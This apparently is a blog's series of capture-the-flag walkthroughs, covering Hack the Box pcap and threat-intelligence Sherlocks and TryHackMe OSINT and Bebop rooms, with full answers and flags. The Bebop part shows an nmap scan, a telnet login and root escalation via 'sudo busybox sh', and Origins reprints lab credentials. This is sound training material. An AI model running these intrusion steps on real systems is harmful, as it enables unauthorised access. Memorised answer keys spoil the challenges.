Capture the Flag

Hack the Box Walkthrough: Origins

HTB Origins LogoWe’re going to keep the pattern going and attack another free Sherlock from HackTheBox called Origins. This is rated “Very Easy” and just consists of a .zip file download containing a .pcap file. As is customary, the password to extract the files is hacktheblue.

Here’s our scenario for this adventure:
A major incident has recently occurred at Forela. Approximately 20 GB of data were stolen from internal s3 buckets and the attackers are now extorting Forela. During the root cause analysis, an FTP server was suspected to be the source of the attack. It was found that this server was also compromised and some data was stolen, leading to further compromises throughout the environment. You are provided with a minimal PCAP file. Your goal is to find evidence of brute force and data exfiltration.

Since our only evidence is in a .pcap file, we’ll have to fire up Wireshark (or your network traffic analyzer of choice).

Task 1: What is the attacker’s IP address?

Looking in the ftp.pcap file, we have multiple protocols represented. Since we know that the ultimate compromise came from FTP, let’s start by filtering traffic that is using the FTP protocol. Adding this as a filter will do the trick: _ws.col.protocol == “FTP”. That gets us down to 163 packets out of the 547 in the file. We can see over and over again that the main source making the requests is 15.206.185.207. If you look, the first few entries have a source of 172.31.45.144, but that is responding. The one making the request for the admin user is 15.206.185.207. Then 172.31.45.144 asks for the password. This makes it definitive which side is which.

Relevant section of the .pcap file showing the answer to task 1

Task 1 Answer: 15.206.185.207

Task 2: It’s critical to get more knowledge about the attackers, even if it’s low fidelity. Using the geolocation data of the IP address used by the attackers, what city do they belong to?

You can go to many different places for this. I’m getting this lookup from this site. Just search the IP and get the city.

Task 2 Answer: Mumbai

Task 3: Which FTP application was used by the backup server? Enter the full name and version. (Format: Name Version)

Take a look back at the filtered capture from Task 1. You can see what the server (172.31.45.144) is responding.

Task 3 Answer: vsFTPd 3.0.5

Task 4: The attacker has started a brute force attack on the server. When did this attack start?

Let’s do an additional filter for only traffic with this IP as the source within the FTP traffic. We can definitely see a brute force attempt happening. If we click the first one (packet 100), it will show details in the bottom left pane. If we expand the Frame 100 section, we can see Arrival Time, UTC Arrival Time, and Epoch Arrival time. The format for the HTB answer wanted one of the two “normal” dates (and not the epoch time). I guessed they wanted UTC as my first shot as that is pretty standard, and that was it.

Relevant section of the .pcap file showing the answer to task 4

Task 4 Answer: 2024-05-03 04:12:54

Task 5: What are the correct credentials that gave the attacker access? (Format username:password)

For this one, I just scrolled down to the end of the attack. I figured the attack would stop when he was successful. When I got to the last row that had PASS in it (number 407). I then right clicked on it and chose Follow -> TCP Stream Ctrl+Alt+Shift+T. That brings up the entire “conversation” in a window and also adds a filter tcp.stream eq 33 so that you now can see all of the individual pieces that make up what has been assembled for us. But from here, we can see what worked.

220 (vsFTPd 3.0.5)

USER forela-ftp

331 Please specify the password.

PASS ftprocks69$

230 Login successful.

SYST

215 UNIX Type: L8

FEAT

211-Features:
 EPRT
 EPSV
 MDTM
 PASV
 REST STREAM
 SIZE
 TVFS
211 End

EPSV

229 Entering Extended Passive Mode (|||63192|)

LIST

150 Here comes the directory listing.
226 Directory send OK.

EPSV

229 Entering Extended Passive Mode (|||40790|)

NLST

150 Here comes the directory listing.
226 Directory send OK.

TYPE I

200 Switching to Binary mode.

SIZE Maintenance-Notice.pdf

213 27855

EPSV

229 Entering Extended Passive Mode (|||9759|)

RETR Maintenance-Notice.pdf

150 Opening BINARY mode data connection for Maintenance-Notice.pdf (27855 bytes).
226 Transfer complete.

MDTM Maintenance-Notice.pdf

213 20240503034329

SIZE s3_buckets.txt

213 268

EPSV

229 Entering Extended Passive Mode (|||23530|)

RETR s3_buckets.txt

150 Opening BINARY mode data connection for s3_buckets.txt (268 bytes).
226 Transfer complete.

MDTM s3_buckets.txt

213 20240503034852

EPSV

229 Entering Extended Passive Mode (|||15028|)

STOR /home/cyberjunkieX0X/HACKED.txt

550 Permission denied.

QUIT

221 Goodbye.

Task 5 Answer: forela-ftp:ftprocks69$

Task 6: The attacker has exfiltrated files from the server. What is the FTP command used to download the remote files?

Look at the command listing from Task 5. You can see it there.

Task 6 Answer: RETR

Task 7: Attackers were able to compromise the credentials of a backup SSH server. What is the password for this SSH server?

Looking at the conversation in Task 5, I don’t see any passwords directly compromised during that interaction. My guess is that they were in some of the files. Let’s take a look at the files that were downloaded. We can see that it looks like the attacker got a file called Maintenance-Notice.pdf and one called s3_buckets.txt. Let’s just go up to the File Menu and select Export Objects -> FTP-DATA. We can then choose Save All and put those files in the directory of our choosing.

The Wireshark Menu options to export the files

The dialog box to save the files

s3_buckets.txt just contains this

https://2023-coldstorage.s3.amazonaws.com # bulk data from 2023, if required anything from here contact simon or alonzo. Retention period is 4 years
https://2022-warmstor.s3.amazonaws.com # pending audit, email alonzo at archivebackups@forela.co.uk for any clearance

Maintenance-Notice.pdf has a lot of information, but contains this juicy paragraph:

For team members requiring urgent access to the backup SSH servers during the maintenance
period, you can use the temporary password "**B@ckup2024!**" - kindly ensure this information is
handled securely and do not share it outside of our team.

Task 7 Answer: **B@ckup2024!**

Task 8: What is the s3 bucket URL for the data archive from 2023?

Just check up in the contents of s3_buckets.txt.

Task 8 Answer: https://2023-coldstorage.s3.amazonaws.com

Task 9: The scope of the incident is huge as Forela’s s3 buckets were also compromised and several GB of data were stolen and leaked. It was also discovered that the attackers used social engineering to gain access to sensitive data and extort it. What is the internal email address used by the attacker in the phishing email to gain access to sensitive data stored on s3 buckets?

This is also in the s3_buckets.txt file.

Task 9 Answer: archivebackups@forela.co.uk

And there we go. That was a fun little exploration of some of the things that Wireshark can do for us.

Capture the Flag

Hack the Box Walkthrough: ElectricBreeze-1

Electric Breeze GraphicToday I’m going to be doing another free Sherlock from Hack the Box called Electric Breeze 1. As you might remember from my last post, Sherlocks are what Hack the Box calls their investigative Capture the Flags (because you’re investigating like Sherlock Holmes, get it?!?).

The scenario says this:
Your security team must always be up-to-date and aware of the threats targeting organizations in your industry. As you begin your journey as a Threat Intelligence Intern, equipped with some SOC experience, your manager has assigned you a task to test your research skills and how effectively you can leverage the MITRE ATT&CK framework. * Conduct thorough research on Volt Typhoon. * Use the MITRE ATT&CK framework to map adversary behavior and tactics into actionable insights. Impress your manager with your assessment, showcasing your passion for threat intelligence.

Unlike the last one, that means that there is nothing to download or start with. We’re just going to do some research and become more familiar and acquainted with some of the Blue Team research tools that are out there.

Task 1: Based on MITRE’s sources, since when has Volt Typhoon been active?

First, we need to look up Volt Typhoon on the MITRE page. Googling MITRE Volt Typoon brought me to this page as my first result. The answer is right in the first paragraph at the top.

Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021 primarily targeting critical infrastructure organizations in the US and its territories including Guam

Task 1 Answer: 2021

Task 2: MITRE identifies two OS credential dumping techniques used by Volt Typhoon. One is LSASS Memory access (T1003.001). What is the Attack ID for the other technique?

I did a CTRL-F and searched for T1003 to find that part of the page. That brought me right to the two OS Credential Dumping techniques and we can see what the other one is.

Task 2 Answer on Page

Task 2 Answer: T1003.003

Task 3: Which database is targeted by the credential dumping technique mentioned earlier?

If we look at that image again, we can see that they “used ntds.util to create domain controller installation media containing usernames and password hashes“. If you didn’t know what NTDS is, here’s a good succinct definition from Semperis.com, “NTDS.DIT, which stands for the New Technology Directory Services Directory Information Tree, is the database for Active Directory Domain Services (AD DS).” Given the number of characters in the textbox on HTB, we know the answer.

Task 3 Answer: Active Directory

Task 4: Which registry hive is required by the threat actor to decrypt the targeted database?

This one I just knew the hives usually used if you’re attacking a Windows Machine and trying to crack passwords. But if you scroll up the page and find other places that the ntds.dit was referenced, you find this quote. The number of characters tell you which one they are looking for.

Volt Typhoon has saved stolen files including the ntds.dit database and the SYSTEM and SECURITY Registry hives locally to the C:\Windows\Temp\ directory.

Task 4 Answer: SYSTEM

Task 5: During the June 2024 campaign, an adversary was observed using a Zero-Day Exploitation targeting Versa Director. What is the name of the Software/Malware that was used?

If we do a CTRL-F for 2024, we find this referencing the June 2024 attack on Versa Director.

Task 5 Answer on Page

If we click that hyperlink for C0039 and read, we find this “Versa Director Zero Day Exploitation involved the development of a new web shell variant, VersaMem.

Task 5 Answer: VersaMem

Task 6: According to the Server Software Component, what type of malware was observed?

Scroll down a little bit under Techniques Used and we find “Server Software Component: Web Shell

Task 6 Answer: Web Shell

Task 7: Where did the malware store captured credentials?

Click the link for VersaMem from that page. Under Techniques Used, we says “VersaMem staged captured credentials locally at /tmp/.temp.data.

Task 7 Answer: /tmp/.temp.data

Task 8: According to MITRE’s reference, a Lumen/Black Lotus Labs article(Taking The Crossroads: The Versa Director Zero-Day Exploitation.), what was the filename of the first malware version scanned on VirusTotal?

Scroll to the bottom of that VersaMem page under the References section and click the link they describe. You find this early in the article, “The VersaMem web shell is a sophisticated JAR web shell that was uploaded to VirusTotal on June 7, 2024, with the filename “VersaTest.png” and currently has zero anti-virus (AV) detections.

Task 8 Answer: VersaTest.png

Task 9: What is the SHA256 hash of the file?

Scroll down a bit in the article. They show an image of it from VirusTotal with the hash below it.

Task 9 Answer: 4bcedac20a75e8f8833f4725adfc87577c32990c3783bf6c743f14599a176c37

Task 10: According to VirusTotal, what is the file type of the malware?

We can just go to VirusTotal and search that hash now that we have it and we get here. The answer is right at the top (and also in the quote back in Task 8).

Task 10 Answer: jar

Task 11: What is the ‘Created by’ value in the file’s Manifest according to VirusTotal?

Click the Details tab and scroll down to the Manifest section

Manifest-Version: 1.0
Archiver-Version: Plexus Archiver
Created-By: Apache Maven 3.6.0
Built-By: versa
Build-Jdk: 11.0.19
Agent-Class: com.versa.vnms.ui.TestMain
Can-Redefine-Classes: true
Can-Retransform-Classes: true
Main-Class: com.versa.vnms.ui.TestMain
Premain-Class: com.versa.vnms.ui.TestMain

Task 11 Answer: Apache Maven 3.6.0

Task 12: What is the CVE identifier associated with this malware and vulnerability?

Go back to the detection tab on Virus total and under the DrWeb analysis, it calls it Exploit.CVE-2024-39717.1. That gives you the Exploit in the middle there.

Task 12 Answer: CVE-2024-39717

Task 13: According to the CISA document(https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf) referenced by MITRE, what is the primary strategy Volt Typhoon uses for defense evasion?

Go read that link. Under the section titled “Defense Evasion”, it says “Volt Typhoon has strong operational security. Their actors primarily use LOTL for defense evasion, which allows them to camouflage their malicious activity with typical system and network behavior, potentially circumventing simplistic endpoint security capabilities.” (Note: LOTL means “Living of the Land”, meaning that the attackers use tools that are already on the system or network instead of installing additional tools from outside the machine/network.)

Task 13 Answer: LOTL

Task 14: In the CISA document, which file name is associated with the command potentially used to analyze logon patterns by Volt Typhoon?

To the document again, “Specifically, in one incident, analysis of the PowerShell console history of a domain
controller indicated that security event logs were directed to a file named user.dat, as evidenced by the executed command Get-EventLog security -instanceid 4624 -after [year-month-date] | fl * | Out-File ‘C:\users\public\documents\user.dat’.

Task 14 Answer: C:\users\public\documents\user.dat

Thats it. A lot of questions/tasks on this one and we just had to do a little research across MITRE, VirusTotal, and a few articles. This really highlights one of the largest, most important tasks if you’re on the Blue Team – research. You have to know about threats and threat actors and stay up to date. Then, you need to understand the things that we researched here so you can tune your rules to be able to identify if these attacks or attackers are targeting you.

Capture the Flag

Hack the Box Walkthrough: Dream Job-1

Hack the Box Dream Job Title ImageOur capture the flag walkthrough today is found over on Hack the Box (HTB). Instead of the offensive security walkthroughs that I’ve been doing, this one is more focused on defensive investigative skills. These classifications for these rooms at HTB are called “Sherlocks” and today’s room is a retired free one called Dream Job-1. It focuses on researching a specific attack campaign, the attackers, and their tactics. Let’s get started.

The first thing we have to do is download the attached zip file called DreamJob1.zip. They give you the password to extract it as hacktheblue. Inside the zip is one file named IOCs.txt containing 3 lines of text. For now, we won’t need this file until Question 10.

Task 1: Who Conducted Operation Dream Job?

So unlike TryHackMe, Hack the Box doesn’t really teach you how to do things. You either have to know how, have worked through some of their training elsewhere, have access to walkthroughs, or be good at searching. In this case, we’re going to go to the MITRE ATT&CK® homepage at https://attack.mitre.org/. Click on CTI then Campaigns.

MITRE ATT&CK® Campaigns Menu

Scroll down until you get to C0022 Operation Dream Job or Ctrl-F and search for Operation Dream Job on the page.

Operation Dream Job Overview

Task 1 Answer: Lazarus Group


Task 2: When was this operation first observed?

Click the name or ID of the campaign and it takes you here: https://attack.mitre.org/campaigns/C0022/. You can see in the Info Box on the right some quick info about this campaign, including when it was First Seen.

Operation Dream Job Info Box

Task 2 Answer: September 2019


Task 3: There are 2 campaigns associated with Operation Dream Job. One is Operation North Star, what is the other?

Using the same image, we can see the Associated Campaigns.

Task 3 Answer: Operation Interception


Task 4: During Operation Dream Job, there were the two system binaries used for proxy execution. One was Regsvr32, what was the other?

Scroll down or search for Binary Proxy Execution. You can see the two mentioned, the answer is the other one.
Operation Dream Job Binary Proxy Execution Tactic

Task 4 Answer: Rundll32


Task 5: What lateral movement technique did the adversary use?

On the page, near the top, you can click into the ATT&CK® Navigator Layers dropdown and View.
Operation Dream Job Navigator Layers Dropdown

After you get to the layers, horizontally scroll right until you see Lateral Movement. Click the header to have the column highlighted (can be a bit cramped and this helps to see).
Operation Dream Job Lateral Movement Technique

Task 5 Answer: Internal Spearphishing


Task 6: What is the technique ID for the previous answer?
Hover/Click on that highlighted part and read the kick out.

Task 6 Answer: T1534


Task 7: What Remote Access Trojan did the Lazarus Group use in Operation Dream Job?

Go back to the Operation Dream Job Campaign Page. Scroll down to Software.

Operation Dream Job Software

Task 7 Answer: DRATzarus


Task 8: What technique did the malware use for execution?

Click the Software Link for DRATzarus and go to https://attack.mitre.org/software/S0694/

Use the Navigator Layers dropdown like we did before and load up its Enterprise Layer and go to Execution. Native API is highlighted.
DRATzarus Execution Technique

Task 8 Answer: Native API


Task 9: What technique did the malware use to avoid detection in a sandbox?

On the same page, under Discovery, there is a box called Virtualization/Sandbox Evasion. Its child box has the answer.
DRATzarus Evasion Technique

Task 9 Answer: Time Based Evasion


Task 10: To answer the remaining questions, utilize VirusTotal and refer to the IOCs.txt file. What is the name associated with the first hash provided in the IOC file?

Looking in the file, the first hash is 7bb93be636b332d0a142ff11aedb5bf0ff56deabba3aa02520c85bd99258406f

If we go to VirusTotal and put in that hash, it takes us here

Searching the First Hash on VirusTotal

After you search, it takes you to the page and the answer is right in the header.

First Hash Executable

Task 10 Answer: IEXPLORE.EXE


Task 11: When was the file associated with the second hash in the IOC first created?

Second hash from the file is adce894e3ce69c9822da57196707c7a15acee11319ccc963b84d83c23c3ea802. If we search it, it takes us here.

Details -> History -> Creation Time

The creation time of the second hash executable

Task 11 Answer: 2020-05-12 19:26:17


Task 12: What is the name of the parent execution file associated with the second hash in the IOC?

Same page, Relations -> Execution Parents

The execution parent of the second hash executable

Task 12 Answer: BAE_HPC_SE.iso


Task 13: Examine the third hash provided. What is the file name likely used in the campaign that aligns with the adversary’s known tactics?

Third hash from the file is 0160375e19e606d06f672be6e43f70fa70093d2a30031affd2929a5c446d07c1. If we search it, it takes us here.

Go to Details -> Names

Remember that according to the task, the victims of this were job seekers and that they used “fake job lures”, so…

The file name of the third hash executable

Task 13 Answer: Salary_Lockheed_Martin_job_opportunities_confidential.doc


Task 14: Which URL was contacted on 2022-08-03 by the file associated with the third hash in the IOC file?

Relations -> Contacted URLs, look for Scanned = 2022-08-03

The contacted url of the third executable

Task 14 Answer: https://markettrendingcenter.com/lk_job_oppor.docx


That’s it. I hope you enjoyed this little Blue Team exercise in researching some details of an attack from some artifacts!

Capture the Flag

TryHackMe Room Walkthrough: OhSINT

What the starting image looks like for the roomToday’s room is called OhSINT. It is another Free Room on TryHackMe, which means that anyone can follow along with me as long as you sign up for a free account. The point of this room is to show you some of the very basics of OSINT (Open-Source Intelligence), which is the process of gathering and analyzing publicly available information to gain insights and intelligence on a subject or target.

Note: This room was updated 2/1/2024, so this walkthrough will probably be different from others if you’re Googling around and found someone who did it closer to release date. This is noted in the room itself.

In this one, we only have an image to go off of. Let’s start with the basics and read the metadata on the image.

$ exiftool WindowsXP_1551719014755.jpg
ExifTool Version Number         : 13.00
File Name                       : WindowsXP_1551719014755.jpg
Directory                       : .
File Size                       : 234 kB
File Modification Date/Time     : 2025:03:08 15:53:27-05:00
File Access Date/Time           : 2025:03:08 15:54:52-05:00
File Inode Change Date/Time     : 2025:03:08 15:54:52-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
XMP Toolkit                     : Image::ExifTool 11.27
GPS Latitude                    : 54 deg 17' 41.27" N
GPS Longitude                   : 2 deg 15' 1.33" W
Copyright                       : OWoodflint
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1
GPS Latitude Ref                : North
GPS Longitude Ref               : West
GPS Position                    : 54 deg 17' 41.27" N, 2 deg 15' 1.33" W

Question 1

Searching for the user that has the copyright, “OWoodflint”, I found this Twitter/X profile here.

What is this user’s avatar of?Cat

Question 2

In this person’s tweets, they have one that says:

From my house I can get free wifi ;D

Bssid: B4:5D:50:AA:86:41 - Go nuts!

BSSID is “Basic Service Set Identifier” and is a unique ID to identify a wifi access point.

If I search bssid lookup, the first result is WiGLE: Wireless Network Mapping at https://wigle.net. Okay, let’s check that out. I put the BSSID in the search on the right of the page and hit Filter and my map didn’t change (except all of the dots that had been on there are now gone). My guess was maybe this left *ONLY* that network on the map, so I zoomed all the way out and saw a dot in Europe. I zoomed in and it is in London. This could be me not knowing how to use the site, but it worked.

What city is this person in?London

Question 3

Same site, just get the info of that point.

What is the SSID of the WAP he connected to?UnileverWiFi

Question 4

Back to googling the username. The first result for me was https://github.com/OWoodfl1nt/ I know people associate their emails on GitHub sometimes, so I went into there. In the readme of his people_finder project, it says “Project starting soon! Email me if you want to help out: OWoodflint@gmail.com”

What is his personal email address?OWoodflint@gmail.com

Question 5

What site did you find his email address on?GitHub

Question 6

I didn’t see anything about a holiday/vacation on X/Twitter or GitHub, so back to the google search. It also returns his blog at https://oliverwoodflint.wordpress.com/ His first – and apparently only – post has the answer.

Where has he gone on holiday?New York

Question 7

I actually found this one multiple places on the internet because of this challenge, but not the intended places. So I’m going to work this as intended. From google, basically I just have these three sites: X/Twitter, GitHub, and his blog. Since this is an OSINT challenge, I don’t expect they want us to try to crack his wordpress site. So, in true CTF-style thinking, I went looking for clues in his blog’s HTML source. I scrolled down and found this:

<p style="color:#ffffff;" class="has-text-color">pennYDr0pper.!</p>

Given the HTML, that would mean that it is actually on his site visible except that the text is the same color as the background. And sure enough:

An image showing that the password is actually on the blog post screen all along

What is the person’s password?pennYDr0pper.!

That’s it. Just a fun little very introductory primer on using search engines and social profiles to do some very basic OSINT and show you the beginning of what’s possible. Any questions, let me know.

Capture the Flag

TryHackMe Room Walkthrough: Bebop

An evil drone, representing the drone in this exerciseToday, we’re going work our way through another TryHackMe room called Bebop. This one isn’t in the Free Tier, but it is considered “Easy” and is a “Walkthrough Room” rather than a “Challenge Room”. Because of that, there will be some additional questions in addition to just posting User and Root flags. Getting started, the room description says, “Who thought making a flying shell was a good idea?”. For the first task, it reads, “For this mission, you have been assigned the codename ‘pilot’. Press the Start Machine button to make the drone takeoff!”.

Task 1

“Deploy the machine.”No answer needed
“What is your codename?”pilot

Task 2

With the machine started and enough time elapsed, I first ran an nmap scan to see what we were dealing with.

~# nmap -sCV -T4 10.10.194.21
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-05 16:25 GMT
Nmap scan report for 10.10.194.21
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
MAC Address: 02:D4:65:95:48:91 (Unknown)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.44 seconds

So, ports 22 (SSH) and 23 (telnet) are open. SSH is rarely the initial way in without any other information, so let’s try telnet, remembering our username of pilot that they’ve already told us and then asked us about. Connecting, I was asked for a login and I typed pilot. This immediately got me to an interactive session. So, they meant Easy easy on this one.

root@ip-10-10-235-128:~# telnet 10.10.194.21
Trying 10.10.194.21...
Connected to 10.10.194.21.
Escape character is '^]'.
login: pilot
Last login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
Want to strip UTF-8 BOM(Byte Order Mark) from given files?

	sed -e '1s/^\xef\xbb\xbf//' < bomfile > newfile
[pilot@freebsd ~]$ 

Doing an ls shows me that we can see the user.txt file in our directory and cat-ing it out gives us the first answer of Task 2.
Okay, so we’re already at a command prompt. No issues here.

[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3m0v3_b3f0r3_fl16h7}

What is the User Flag?THM{r3m0v3_b3f0r3_fl16h7}

Moving on, we need to see what we can do to elevate our privileges to root to get the root flag. One of the first things I usually do is sudo -l to see what we can run as sudo. Since we didn’t use a password to log in, we didn’t know the password if there was one. Luckily, it didn’t ask us one to run this command.

[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox

Okay, so we can run the binary busybox with sudo as root with no password. Is that useful? This is where I check my favorite PrivEsc companion GTFOBins to see. You can find the entry for busybox here. Taking a small aside, busybox is a utility that you often find in embedded systems that contains its own implementations of things like ls, sh, mv, etc. In these systems, you can execute the commands by calling busybox {command}, or – quite often – the person who set up the system will symlink ls to just call busybox ls, like this: ln -s /bin/busybox /bin/ls, so you might not even know that busybox is involved. This would allow you to only have one binary instead of many, with an overall size savings.

In this case, that means if I call sudo busybox sh, I’ll get a shell opened as root, which is just what happened.

[pilot@freebsd ~]$ sudo busybox sh
# whoami
root

From there, we navigate to the root directory and cat out the file.

# cd /root
# ls
.bash_history	.history	.login		root.txt
.cshrc		.k5login	.profile
# cat root.txt
THM{h16hw4y_70_7h3_d4n63r_z0n3}

What is the Root Flag?THM{h16hw4y_70_7h3_d4n63r_z0n3}

Task 3

What is the low privilleged user?pilot
What binary was used to escalate privileges?busybox
What service was used to gain an initial shell?telnet

Last question, we already knew from what we saw in our nmap scan and also at the dump of information at our login prompt, but you can always check this way from within the system itself.

# uname -a
FreeBSD freebsd 11.2-STABLE FreeBSD 11.2-STABLE #0 r345837: Thu Apr  4 02:07:22 UTC 2019     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64

What Operating System does the drone run?FreeBSD

That’s it. The most basic of rooms, but a pretty good entry point into some basic recon and basic PrivEsc if you’re new to this.